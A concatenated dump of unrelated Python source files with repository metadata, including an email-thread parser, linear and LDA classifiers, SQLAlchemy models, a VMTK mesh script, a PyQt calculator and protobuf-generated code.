# http://mypy.pythonblogs.com/12_mypy/archive/1253_workaround_for_python_bug_ascii_codec_cant_encode_character_uxa0_in_position_111_ordinal_not_in_range128.html
reload(sys)
sys.setdefaultencoding("utf8")
logging.basicConfig(format='%(asctime)s : %(levelname)s :: %(message)s', level=logging.DEBUG)
def process_folder(arg_folder, arg_reference, arg_in_or_out, arg_document_count_limit):
result = dict()
document_count = 0
no_references_count = 0
references_count = 0
message_id_count = 0
for root, subdirectories, files in os.walk(arg_folder):
for current in files:
# first get the references node
if document_count < arg_document_count_limit:
current_full_file_name = os.path.join(root, current)
if document_count % 1000 == 0 and document_count > 0:
logging.debug("%d %s", document_count, current_full_file_name)
references, message = get_references(current_full_file_name)
if 'references' in references.keys():
# if references.has_key('references'):
references_count += 1
else:
no_references_count += 1
document_count += 1
if 'message-id' in references.keys():
message_id_count += 1
if arg_reference in references.keys() and arg_in_or_out:
result[current] = message
elif arg_reference not in references.keys() and not arg_in_or_out:
result[current] = message
logging.info('documents : %d message-id: %d references: %d no references: %d' % (
document_count, message_id_count, references_count, no_references_count))
return result
def get_references(current_file):
result = {}
with open(current_file, 'rb') as fp:
message = pyzmail.message_from_file(fp)
if 'Message-Id' in message.keys():
result['message-id'] = message['Message-Id']
elif 'Message-ID' in message.keys():
result['message-id'] = message['Message-ID']
elif 'Message-id' in message.keys():
result['message-id'] = message['Message-id']
else:
logging.warn('no message id in file %s', current_file)
logging.info([key for key in message.keys()])
if 'References' in message.keys():
references = message['References'].split(' ')
result['references'] = references
if 'In-Reply-To' in message.keys():
result['in-reply-to'] = message['In-Reply-To']
return result, message
def run():
start_time = time.time()
with open('roots-settings.json') as data_file:
data = json.load(data_file)
logging.debug(data)
input_folder = data['input_folder']
document_count_limit = data['document_count_limit']
if document_count_limit == -1:
document_count_limit = sys.maxint
reference_of_interest = data['reference']
# our internal keys are always lowercase, so we want to be sure
# to use a lowercase reference for comparisons
reference_of_interest = reference_of_interest.lower()
in_or_out = data['reference_in']
in_or_out = bool(in_or_out)
pickle_file = data['output_pickle_file']
documents_of_interest = process_folder(input_folder, reference_of_interest, in_or_out, document_count_limit)
logging.info(
'found %d documents of interest: %s' % (len(documents_of_interest), sorted(documents_of_interest.keys())))
with open(pickle_file, 'wb') as output_fp:
pickle.dump(documents_of_interest, output_fp)
logging.info('wrote pickled dictionary to %s.' % pickle_file)
finish_time = time.time()
elapsed_hours, elapsed_remainder = divmod(finish_time - start_time, 3600)
elapsed_minutes, elapsed_seconds = divmod(elapsed_remainder, 60)
logging.info("Time: {:0>2}:{:0>2}:{:05.2f}".format(int(elapsed_hours), int(elapsed_minutes), elapsed_seconds))
if __name__ == '__main__':
run()
| 2.046875 | 2 |
python/760.find-anagram-mappings.py | stavanmehta/leetcode | 0 | 10877 | <filename>python/760.find-anagram-mappings.py<gh_stars>0
class Solution:
def anagramMappings(self, A: List[int], B: List[int]) -> List[int]:
| 2.03125 | 2 |
src/jdk.internal.vm.compiler/.mx.graal/mx_graal.py | siweilxy/openjdkstudy | 2 | 10878 | <filename>src/jdk.internal.vm.compiler/.mx.graal/mx_graal.py
#
# ----------------------------------------------------------------------------------------------------
#
# Copyright (c) 2007, 2015, Oracle and/or its affiliates. All rights reserved.
# DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER.
#
# This code is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License version 2 only, as
# published by the Free Software Foundation.
#
# This code is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
# version 2 for more details (a copy is included in the LICENSE file that
# accompanied this code).
#
# You should have received a copy of the GNU General Public License version
# 2 along with this work; if not, write to the Free Software Foundation,
# Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA
# or visit www.oracle.com if you need additional information or have any
# questions.
#
# ----------------------------------------------------------------------------------------------------
import mx
if mx.get_jdk(tag='default').javaCompliance < "1.9":
mx.abort('JAVA_HOME is not a JDK9: ' + mx.get_jdk(tag='default').home)
from mx_graal_9 import mx_post_parse_cmd_line, run_vm, get_vm, isJVMCIEnabled # pylint: disable=unused-import
import mx_graal_bench # pylint: disable=unused-import
| 1.960938 | 2 |
linear_regression.py | wail007/ml_playground | 0 | 10879 | import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from scipy.stats import multivariate_normal
class _LinearModel(object):
def __init__(self):
self.w = None
def fit(self, x, y):
pass
def predict(self, x):
return np.dot(x, self.w)
def cost(self, x, y):
pass
def precision(self, x, y):
p = self.predict(x)
return (1.0 / len(p)) * np.sum(p == y)
class LeastSquareRegression(_LinearModel):
def __init__(self):
super(LeastSquareRegression, self).__init__()
def fit(self, x, y):
xt = x.transpose()
self.w = np.linalg.pinv(np.dot(xt, x)).dot(xt).dot(y)
def cost(self, x, y):
""" Residual Sum of Squares """
r = y - np.dot(x, self.w)
rt= np.transpose(r)
return (1.0 / len(x)) * np.trace(np.dot(rt, r))
class RidgeRegression(LeastSquareRegression):
def __init__(self, incr=0.1, min_change=0.001):
super(RidgeRegression, self).__init__()
self.incr = incr
self.min_change = min_change
def fit(self, x, y):
xtrain, xval = np.split(x, [int(0.7*len(x))])
ytrain, yval = np.split(y, [int(0.7*len(y))])
alpha = 0.0
best_alpha = 0.0
best_cost = float("inf")
old_cost = float("inf")
new_cost = float("inf")
while True:
self._fit(xtrain, ytrain, alpha)
new_cost = self.cost(xval, yval)
if new_cost < best_cost:
best_cost = new_cost
best_alpha = alpha
#print("cost: %f, alpha: %f" % (best_cost, best_alpha))
if abs(new_cost - old_cost) < self.min_change:
break
old_cost = new_cost
alpha += self.incr
self._fit(xtrain, ytrain, best_alpha)
def _fit(self, x, y, alpha):
x = x[:,1:]
xt = np.transpose(x)
self.w = np.linalg.pinv(np.dot(xt, x) + alpha * np.eye(x.shape[1])).dot(xt).dot(y)
bias = np.mean(y, axis=0, keepdims=True) - np.dot(np.mean(x, axis=0, keepdims=True), self.w)
self.w = np.vstack([bias, self.w])
class LeastSquareClassification(LeastSquareRegression):
def __init__(self):
super(LeastSquareClassification, self).__init__()
def predict(self, x):
return super(LeastSquareClassification, self).predict(x).argmax(axis=1)
class RidgeClassification(RidgeRegression):
def __init__(self, incr=0.1, min_change=0.001):
super(RidgeClassification, self).__init__(incr, min_change)
def predict(self, x):
return super(RidgeClassification, self).predict(x).argmax(axis=1)
class LDAClassification(_LinearModel):
def __init__(self):
self.w = None
self.priors = None
self.means = []
self.covs = []
def fit(self, x, y):
k = y.shape[1]
y_arg = np.argmax(y, axis=1)
class_count = np.sum (y, axis=0, keepdims=True)
self.priors = (1.0 / len(y)) * np.sum (y, axis=0, keepdims=True)
self.w = self._lda(x, y)
x_proj = np.dot(x, self.w)
means = (1.0 / class_count.T) * np.dot(y.T, x_proj)
for i in xrange(k):
xk_proj = x_proj[y_arg==i]
self.means.append(np.mean(xk_proj, axis = 0))
self.covs .append(np.cov (xk_proj, rowvar=False))
def predict(self, x):
k = self.w.shape[1]
x_proj = np.dot(x, self.w)
likelihood = np.column_stack([multivariate_normal.pdf(x_proj, self.means[i], self.covs[i]) for i in xrange(k)])
posterior = (likelihood * self.priors)
posterior = posterior / np.sum(posterior, axis=1, keepdims=True)
return np.argmax(posterior, axis=1)
def _lda(self, x, y):
k = y.shape[1]
y_arg = np.argmax(y, axis=1)
class_count= np.sum (y, axis=0, keepdims=True)
total_mean = np.mean(x, axis=0, keepdims=True)
class_mean = (1.0 / class_count.T) * np.dot(y.T, x)
mk_m = class_mean - total_mean
b_cov = np.dot(class_count * mk_m.T, mk_m)
w_cov = np.zeros(b_cov.shape)
for i in xrange(k):
xk = x[y_arg == i]
xk_mk = xk - class_mean[i]
w_cov += np.dot(xk_mk.T, xk_mk)
eig_vals, eig_vecs = np.linalg.eig(np.dot(np.linalg.pinv(w_cov), b_cov))
eig_vals = np.abs(eig_vals)
eig_args = np.argsort(eig_vals)[::-1][:k]
return eig_vecs[:, eig_args]
| 2.953125 | 3 |
pygments_lexer_solidity/__init__.py | veox/pygments-lexer-solidity | 2 | 10880 | from .lexer import SolidityLexer, YulLexer
__all__ = ['SolidityLexer', 'YulLexer']
| 1.03125 | 1 |
optimal_buy_gdax/history.py | coulterj/optimal-buy-gdax | 0 | 10881 | #!/usr/bin/env python3
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import Column, String, Float, DateTime, Integer
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
Base = declarative_base()
class Order(Base):
__tablename__ = 'orders'
id = Column(Integer, primary_key=True)
currency = Column(String)
price = Column(Float)
size = Column(Float)
gdax_order_id = Column(String)
created_at = Column(DateTime)
class Withdrawal(Base):
__tablename__ = 'withdrawals'
id = Column(Integer, primary_key=True)
currency = Column(String)
amount = Column(Float)
crypto_address = Column(String)
gdax_withdrawal_id = Column(String)
class Deposit(Base):
__tablename__ = 'deposits'
id = Column(Integer, primary_key=True)
currency = Column(String)
amount = Column(Float)
payment_method_id = Column(String)
payout_at = Column(DateTime)
gdax_deposit_id = Column(String)
def get_session(engine):
engine = create_engine(engine)
Base.metadata.create_all(engine)
Session = sessionmaker(bind=engine)
session = Session()
return session
| 2.75 | 3 |
vmtkScripts/vmtkmeshboundaryinspector.py | ramtingh/vmtk | 0 | 10882 | <filename>vmtkScripts/vmtkmeshboundaryinspector.py
#!/usr/bin/env python
## Program: VMTK
## Module: $RCSfile: vmtkmeshboundaryinspector.py,v $
## Language: Python
## Date: $Date: 2006/05/26 12:35:13 $
## Version: $Revision: 1.3 $
## Copyright (c) <NAME>, <NAME>. All rights reserved.
## See LICENSE file for details.
## This software is distributed WITHOUT ANY WARRANTY; without even
## the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
## PURPOSE. See the above copyright notices for more information.
from __future__ import absolute_import #NEEDS TO STAY AS TOP LEVEL MODULE FOR Py2-3 COMPATIBILITY
import vtk
import sys
from vmtk import vtkvmtk
from vmtk import vmtkrenderer
from vmtk import pypes
class vmtkMeshBoundaryInspector(pypes.pypeScript):
def __init__(self):
pypes.pypeScript.__init__(self)
self.Mesh = None
self.CellEntityIdsArrayName = 'CellEntityIds'
self.VolumeCellEntityId = 0
self.WallCellEntityId = 1
self.vmtkRenderer = None
self.OwnRenderer = 0
self.ReferenceSystems = None
self.SetScriptName('vmtkmeshboundaryinspector')
self.SetScriptDoc('display a 3D render of the mesh with individual boundary groups colored and labeled')
self.SetInputMembers([
['Mesh','i','vtkUnstructuredGrid',1,'','the input mesh','vmtkmeshreader'],
['CellEntityIdsArrayName','entityidsarray','str',1,''],
['VolumeCellEntityId','volumeid','int',1],
['WallCellEntityId','wallid','int',1],
['vmtkRenderer','renderer','vmtkRenderer',1,'','external renderer']])
self.SetOutputMembers([
['ReferenceSystems','o','vtkPolyData',1,'','the output reference systems with boundary information','vmtksurfacewriter']
])
def Execute(self):
if not self.Mesh:
self.PrintError('Error: No input mesh.')
return
if not self.CellEntityIdsArrayName:
self.PrintError('Error: No input CellEntityIdsArrayName.')
return
if not self.vmtkRenderer:
self.vmtkRenderer = vmtkrenderer.vmtkRenderer()
self.vmtkRenderer.Initialize()
self.OwnRenderer = 1
self.vmtkRenderer.RegisterScript(self)
threshold = vtk.vtkThreshold()
threshold.SetInputData(self.Mesh)
threshold.ThresholdByUpper(self.VolumeCellEntityId+0.5)
threshold.SetInputArrayToProcess(0,0,0,1,self.CellEntityIdsArrayName)
threshold.Update()
boundaryMesh = threshold.GetOutput()
boundaryMesh.GetCellData().SetActiveScalars(self.CellEntityIdsArrayName)
boundaryMapper = vtk.vtkDataSetMapper()
boundaryMapper.SetInputData(boundaryMesh)
boundaryMapper.ScalarVisibilityOn()
boundaryMapper.SetScalarModeToUseCellData()
boundaryMapper.SetScalarRange(boundaryMesh.GetCellData().GetScalars().GetRange())
boundaryActor = vtk.vtkActor()
boundaryActor.SetMapper(boundaryMapper)
self.vmtkRenderer.Renderer.AddActor(boundaryActor)
wallThreshold = vtk.vtkThreshold()
wallThreshold.SetInputData(boundaryMesh)
wallThreshold.ThresholdByLower(self.WallCellEntityId+0.5)
wallThreshold.SetInputArrayToProcess(0,0,0,1,self.CellEntityIdsArrayName)
wallThreshold.Update()
wallMeshToSurface = vtk.vtkGeometryFilter()
wallMeshToSurface.SetInputConnection(wallThreshold.GetOutputPort())
wallMeshToSurface.Update()
boundaryReferenceSystems = vtkvmtk.vtkvmtkBoundaryReferenceSystems()
boundaryReferenceSystems.SetInputConnection(wallMeshToSurface.GetOutputPort())
boundaryReferenceSystems.SetBoundaryRadiusArrayName("BoundaryRadius")
boundaryReferenceSystems.SetBoundaryNormalsArrayName("BoundaryNormals")
boundaryReferenceSystems.SetPoint1ArrayName("Point1Array")
boundaryReferenceSystems.SetPoint2ArrayName("Point2Array")
boundaryReferenceSystems.Update()
self.ReferenceSystems = boundaryReferenceSystems.GetOutput()
cellEntityIdsArray = vtk.vtkIntArray()
cellEntityIdsArray.SetName(self.CellEntityIdsArrayName)
cellEntityIdsArray.SetNumberOfTuples(self.ReferenceSystems.GetNumberOfPoints())
self.ReferenceSystems.GetPointData().AddArray(cellEntityIdsArray)
boundaryThreshold = vtk.vtkThreshold()
boundaryThreshold.SetInputData(boundaryMesh)
boundaryThreshold.ThresholdByUpper(self.WallCellEntityId+0.5)
boundaryThreshold.SetInputArrayToProcess(0,0,0,1,self.CellEntityIdsArrayName)
boundaryThreshold.Update()
boundaryMeshToSurface = vtk.vtkGeometryFilter()
boundaryMeshToSurface.SetInputConnection(boundaryThreshold.GetOutputPort())
boundaryMeshToSurface.Update()
boundarySurface = boundaryMeshToSurface.GetOutput()
pointCells = vtk.vtkIdList()
surfaceCellEntityIdsArray = vtk.vtkIntArray()
surfaceCellEntityIdsArray.DeepCopy(boundarySurface.GetCellData().GetArray(self.CellEntityIdsArrayName))
self.PrintLog('')
for i in range(self.ReferenceSystems.GetNumberOfPoints()):
pointId = boundarySurface.FindPoint(self.ReferenceSystems.GetPoint(i))
boundarySurface.GetPointCells(pointId,pointCells)
cellId = pointCells.GetId(0)
cellEntityId = surfaceCellEntityIdsArray.GetValue(cellId)
cellEntityIdsArray.SetValue(i,cellEntityId)
origin = self.ReferenceSystems.GetPoint(i)
normal = self.ReferenceSystems.GetPointData().GetArray("BoundaryNormals").GetTuple3(i)
radius = self.ReferenceSystems.GetPointData().GetArray("BoundaryRadius").GetTuple1(i)
logLine = 'CellEntityId: %d\n' % cellEntityId
logLine += ' Origin: %f, %f, %f\n' % (origin[0],origin[1],origin[2])
logLine += ' Normal: %f, %f, %f\n' % (normal[0],normal[1],normal[2])
logLine += ' Radius: %f\n' % radius
self.PrintLog(logLine)
self.ReferenceSystems.GetPointData().SetActiveScalars(self.CellEntityIdsArrayName)
labelsMapper = vtk.vtkLabeledDataMapper();
labelsMapper.SetInputData(self.ReferenceSystems)
labelsMapper.SetLabelModeToLabelScalars()
labelsActor = vtk.vtkActor2D()
labelsActor.SetMapper(labelsMapper)
self.vmtkRenderer.Renderer.AddActor(labelsActor)
self.vmtkRenderer.Render()
if self.OwnRenderer:
self.vmtkRenderer.Deallocate()
if __name__=='__main__':
main = pypes.pypeMain()
main.Arguments = sys.argv
main.Execute()
| 2.1875 | 2 |
setup.py | sriz1/mudslide | 4 | 10883 | <filename>setup.py
from setuptools import setup
from distutils.util import convert_path
main_ns = {}
ver_path = convert_path('mudslide/version.py')
with open(ver_path) as ver_file:
exec(ver_file.read(), main_ns)
def readme():
with open("README.md") as f:
return f.read()
setup(
name='mudslide',
packages=['mudslide'],
version=main_ns['__version__'],
license='MIT',
description='Package to simulate nonadiabatic molecular dynamics using trajectory methods',
author='<NAME>',
author_email='<EMAIL>',
url='https://github.com/smparker/mudslide',
download_url='https://github.com/smparker/mudslide/archive/v0.9.tar.gz',
keywords= ['science', 'chemistry', 'nonadiabatic dynamics'],
install_requires=[
'numpy>=1.19',
'scipy',
'typing_extensions'
],
test_suite='nose.collector',
tests_require=['nose'],
entry_points={
'console_scripts': [
'mudslide = mudslide.__main__:main',
'mudslide-surface = mudslide.surface:main'
]
},
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'Topic :: Scientific/Engineering :: Chemistry',
'Topic :: Scientific/Engineering :: Physics',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8'
]
)
| 1.398438 | 1 |
src/sklearn/sklearn_random_forest_test.py | monkeychen/python-tutorial | 0 | 10884 | import csv
import joblib
from sklearn.metrics import accuracy_score
data = []
features = []
targets = []
feature_names = []
users = []
with open('satisfaction_feature_names.csv') as name_file:
column_name_file = csv.reader(name_file)
feature_names = next(column_name_file)[2:394]
with open('cza_satisfaction_train_0922.csv') as data_file:
csv_file = csv.reader(data_file)
idx = 0
for content in csv_file:
idx = idx + 1
if idx <= 10000:
continue
if idx > 50000:
break
content = content[:2] + list(map(float, content[2:]))
if len(content) != 0:
data.append(content)
features.append(content[2:394])
targets.append(content[-1])
users.append(content[1])
clf, sorted_feature_scores = joblib.load("cza_rf.pkl")
predict_result = clf.predict(features)
print(sorted_feature_scores)
print(accuracy_score(predict_result, targets))
result = list(zip(users, predict_result))
print(result[:10])
print(sum(predict_result))
print(sum([flag[1] for flag in result]))
with open("rf_predict_result.csv", "w", encoding="UTF-8") as w_file:
result_file = csv.writer(w_file)
for idx, row in enumerate(result):
if idx > 10:
break
row = list(row)
row.insert(0, 20200928)
result_file.writerow(row)
| 2.828125 | 3 |
py/test.py | BEARUBC/grasp-kernel | 1 | 10885 | class TestClass:
def __init__(self, list, name):
self.list = list
self.name = name
def func1():
print("func1 print something")
def func2():
print("func2 print something")
integer = 8
return integer
def func3():
print("func3 print something")
s = "func3"
return s
def func4():
print("func4 print something")
listIntegers = [1,2,3,4,5]
return listIntegers
def func5():
print("func5 print something")
listStrings = ["a","b","c","d","e"]
return listStrings
print("Hello World")
# test = TestClass()
| 3.625 | 4 |
tests/utils/_process_nonwin.py | chrahunt/quicken | 3 | 10886 | <reponame>chrahunt/quicken
"""Utilities for managing child processes within a scope - this ensures
tests run cleanly even on failure and also gives us a mechanism to
get debug info for our children.
"""
import logging
import os
import sys
from contextlib import contextmanager
from typing import ContextManager, List
import psutil
import process_tracker
process_tracker.install()
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.DEBUG)
__all__ = [
"active_children",
"contained_children",
"disable_child_tracking",
"kill_children",
]
def _get_create_time(create_time):
"""Given basic process create time, return one that would
match psutil.
"""
boot_time = psutil.boot_time()
clock_ticks = os.sysconf("SC_CLK_TCK")
return boot_time + (create_time / clock_ticks)
def active_children() -> List[psutil.Process]:
"""Returns the active child processes.
"""
out = []
children = process_tracker.children()
for pid, create_time in children:
try:
process = psutil.Process(pid)
except psutil.NoSuchProcess:
continue
else:
if process.create_time() == _get_create_time(create_time):
out.append(process)
return out
@contextmanager
def contained_children(timeout=1, assert_graceful=True) -> ContextManager:
"""Automatically kill any Python processes forked in this context, for
cleanup. Handles any descendants.
Timeout is seconds to wait for graceful termination before killing children.
"""
try:
# TODO: What to yield here?
yield
finally:
alive = kill_children(timeout)
num_alive = len(alive)
# Get current exception - if something was raised we should be raising
# that.
# XXX: Need to check use cases to see if there are any cases where
# we are expecting an exception outside of the 'contained_children'
# block.
_, exc, _ = sys.exc_info()
if assert_graceful and exc is None:
assert not num_alive, f"Unexpected children still alive: {alive}"
def disable_child_tracking():
# TODO: Actually needed?
pids = [p.pid for p in active_children()]
return pids
def kill_children(timeout=1) -> List[psutil.Process]:
"""
Kill any active children, returning any that were not terminated within
timeout.
Args:
timeout: time to wait before killing.
Returns:
list of processes that had to be killed forcefully.
"""
procs = active_children()
for p in procs:
try:
p.terminate()
except psutil.NoSuchProcess:
pass
gone, alive = psutil.wait_procs(procs, timeout=timeout)
for p in alive:
logger.warning("Cleaning up child: %d", p.pid)
p.kill()
return alive
| 2.171875 | 2 |
data/meneame/parse_meneame.py | segurac/DeepQA | 0 | 10887 | <gh_stars>0
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright 2016 <NAME>. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
import os
import sys
import gzip
parents = {}
conversations = []
samples = {}
class Sample:
comentario_id = None
parent_id = []
commentario = ''
comentario_id = None
parent_id = []
with gzip.open(sys.argv[1]) as f:
for line in f:
try:
line = line.decode('utf-8').strip()
#print(line)
splitted_line = line.split()
if len(splitted_line) == 0:
continue
head = splitted_line[0]
rest = splitted_line[1:]
if head == 'comentario_id:':
comentario_id = rest[0]
parent_id = []
if head == 'parent_id:':
parent_id.append(rest[0])
if head == 'comentario:':
comentario = rest
if len(comentario) == 0:
comentario_id = None
parent_id = []
continue
#Store this comment in parents dictionary
if comentario_id is not None:
sample = Sample()
sample.comentario_id = comentario_id
sample.parent_id = parent_id
sample.comentario = comentario
samples[comentario_id] = sample
comentario_id = None
parent_id = []
except:
continue
for k in samples:
sample = samples[k]
for parent in sample.parent_id:
if parent in samples:
qa = [samples[parent].comentario, sample.comentario]
conversations.append(qa)
for conversation in conversations:
print('********************************************')
for frase in conversation:
print(*frase)
| 2.609375 | 3 |
dfstools/tests/test_relationship_tools.py | orekunrin/comp410_summer2020 | 0 | 10888 | import unittest
import pandas as pd
import git
import os
from dfstools import get_dataset_dtypes
from dfstools import find_related_cols_by_name
from dfstools import find_related_cols_by_content
from dfstools import find_parent_child_relationships
from dfstools import pecan_cookies_load_data
class RelationshipTools(unittest.TestCase):
def test_get_dataset_dtypes(self):
expected = {'airlines': {'carrier': {'dtype': 'O'}},
'airports': {'dest': {'dtype': 'O'}},
'flights': {'dest': {'dtype': 'O'}, 'carrier': {'dtype': 'O'},'flight_id': {'dtype': 'O'}},
'trip_logs': {'flight_id': {'dtype': 'O'}}}
result = get_dataset_dtypes(None)
self.assertEqual(expected, result)
expected = {
'airlines': {'carrier': {'dtype': 'O',
# 'key_candidate': True,
'relationships': [{'flights.carrier': {}}]}},
'airports': {'dest': {'dtype': 'O',
# 'key_candidate': True,
'relationships': [{'flights.dest': {}}]}},
'flights': {'dest': {'dtype': 'O',
# 'key_candidate': False,
'relationships': [{'airports.dest': {}}]},
'carrier': {'dtype': 'O',
# 'key_candidate': False,
'relationships': [{'airlines.carrier': {}}]},
'flight_id': {'dtype': 'O',
# 'key_candidate': True,
'relationships': [{'trip_logs.flight_id': {}}]}},
'trip_logs': {'flight_id': {'dtype': 'O',
# 'key_candidate': False,
'relationships': [{'flights.flight_id': {}}]}}}
data = os.path.join(git.Repo('.', search_parent_directories=True).working_tree_dir, 'data')
dataframe_dict = {'airlines': pd.read_csv(os.path.join(data, 'airlines', 'airlines.csv')),
'flights': pd.read_csv(os.path.join(data, 'flights', 'flights.csv')),
'airports': pd.read_csv(os.path.join(data, 'airports', 'airports.csv'))}
result = find_related_cols_by_name(dataframe_dict, result)
self.assertEqual(expected, result)
def test_find_related_cols_by_content(self):
# ---pecan cookies sprint one test case---
expected = {
'airports': {'dest': {'relationships': ['flights.origin', 'flights.dest']},
'dest_city': {'relationships': ['flights.origin_city']},
'dest_state': {'relationships': ['flights.origin_state']}},
'airlines': {'carrier': {'relationships': ['flights.carrier']}},
"flights": {
"flight_id": {"relationships": []},
"origin": {"relationships": ["airports.dest"]},
"origin_city": {"relationships": ["airports.dest_city"]},
"origin_state": {"relationships": ["airports.dest_state"]},
"dest": {"relationships": ["airports.dest"]},
"distance_group": {"relationships": []},
"carrier": {"relationships": ["airlines.carrier"]},
"flight_num": {"relationships": []},
"first_trip_logs_time": {"relationships": []}}
}
data_list = pecan_cookies_load_data()
result = find_related_cols_by_content(data_list)
self.assertEqual(expected, result)
#result = find_parent_child_relationships(None, result)
#self.assertEqual(expected, result)
if __name__ == '__main__':
unittest.main()
| 2.6875 | 3 |
Calculator.py | KunalKatiyar/Calculator | 0 | 10889 | import sys
from PyQt5.QtWidgets import QApplication, QWidget, QPushButton, QHBoxLayout, QGroupBox, QDialog, QVBoxLayout, QGridLayout,QMainWindow, QApplication, QWidget, QPushButton, QAction, QLineEdit, QMessageBox
from PyQt5.QtGui import QIcon
from PyQt5.QtCore import pyqtSlot
class App(QDialog):
def __init__(self):
super().__init__()
self.title = 'Calculator'
self.left = 10
self.top = 10
self.width = 640
self.height = 480
self.initUI()
def initUI(self):
self.setWindowTitle(self.title)
self.setGeometry(self.left, self.top, self.width, self.height)
self.createGridLayout()
windowLayout = QVBoxLayout()
windowLayout.addWidget(self.horizontalGroupBox)
self.setLayout(windowLayout)
self.textbox = QLineEdit(self)
self.textbox.move(20, 40)
self.textbox.resize(600,35)
# Original Approach
# buttonp = QPushButton('+', self)
# buttonp.setToolTip('Addition Operator')
# buttonp.move(100,70)
# buttonp.clicked.connect(self.on_click)
# buttonm = QPushButton('-', self)
# buttonm.setToolTip('Subtraction Operator')
# buttonm.move(100,100)
# buttonm.clicked.connect(self.on_click)
self.show()
def createGridLayout(self):
self.horizontalGroupBox = QGroupBox("Grid")
layout = QGridLayout()
# layout.setColumnStretch(1, 2)
# layout.setColumnStretch(2, 4)
layout.addWidget(QPushButton('1'),0,0)
layout.addWidget(QPushButton('2'),0,1)
layout.addWidget(QPushButton('3'),0,2)
layout.addWidget(QPushButton('4'),1,0)
layout.addWidget(QPushButton('5'),1,1)
layout.addWidget(QPushButton('6'),1,2)
layout.addWidget(QPushButton('7'),2,0)
layout.addWidget(QPushButton('8'),2,1)
layout.addWidget(QPushButton('9'),2,2)
layout.addWidget(QPushButton('0'),3,1)
layout.addWidget(QPushButton('.'),3,0)
layout.addWidget(QPushButton('='),3,2)
layout.addWidget(QPushButton('+'),0,4)
layout.addWidget(QPushButton('-'),1,4)
layout.addWidget(QPushButton('*'),2,4)
layout.addWidget(QPushButton('/'),3,4)
self.horizontalGroupBox.setLayout(layout)
# @pyqtSlot()
# def on_click(self):
# print('Button click')
@pyqtSlot()
def on_click(self):
textboxValue = "Good"
QMessageBox.question(self, 'Message - pythonspot.com', "You typed: " + textboxValue, QMessageBox.Ok, QMessageBox.Ok)
self.textbox.setText("Good")
if __name__ == '__main__':
app = QApplication(sys.argv)
ex = App()
sys.exit(app.exec_()) | 2.859375 | 3 |
analysis/src/util/_concepts.py | Domiii/code-dbgs | 95 | 10890 | <filename>analysis/src/util/_concepts.py
# // ###########################################################################
# // Queries
# // ###########################################################################
# -> get a single cell of a df (use `iloc` with `row` + `col` as arguments)
df.iloc[0]['staticContextId']
# -> get one column as a list
allFunctionNames = staticContexts[['displayName']].to_numpy().flatten().tolist()
# -> get all rows that match a condition
callLinked = staticTraces[~staticTraces['callId'].isin([0])]
# -> exclude columns
df.drop(['A', 'B'], axis=1)
# -> complex queries
staticTraces.query(f'callId == {callId} or resultCallId == {callId}')
# -> join queries (several examples)
# https://stackoverflow.com/a/40869861
df.set_index('key').join(other.set_index('key'))
B.query('client_id not in @A.client_id')
B[~B.client_id.isin(A.client_id)]
# merging dfs
# https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.merge.html
pd.merge(df1, df2, on=['A', 'B'])
df1.merge(df2, left_on='lkey', right_on='rkey')
# // ###########################################################################
# // Display
# // ###########################################################################
# -> display a groupby object (https://stackoverflow.com/questions/22691010/how-to-print-a-groupby-object)
groups = df.groupby('A')
for key, item in groups:
group = groups.get_group(key)
display(group)
# .to_numpy().flatten().tolist() | 2.28125 | 2 |
src/py/proto/v3/diff/UniversalDiff_pb2.py | zifter/conf_protobuf | 0 | 10891 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: v3/diff/UniversalDiff.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from v3.diff import Transaction_pb2 as v3_dot_diff_dot_Transaction__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='v3/diff/UniversalDiff.proto',
package='v3.diff',
syntax='proto3',
serialized_pb=_b('\n\x1bv3/diff/UniversalDiff.proto\x12\x07v3.diff\x1a\x19v3/diff/Transaction.proto\";\n\rUniversalDiff\x12*\n\x0ctransactions\x18\x01 \x03(\x0b\x32\x14.v3.diff.Transactionb\x06proto3')
,
dependencies=[v3_dot_diff_dot_Transaction__pb2.DESCRIPTOR,])
_UNIVERSALDIFF = _descriptor.Descriptor(
name='UniversalDiff',
full_name='v3.diff.UniversalDiff',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='transactions', full_name='v3.diff.UniversalDiff.transactions', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=67,
serialized_end=126,
)
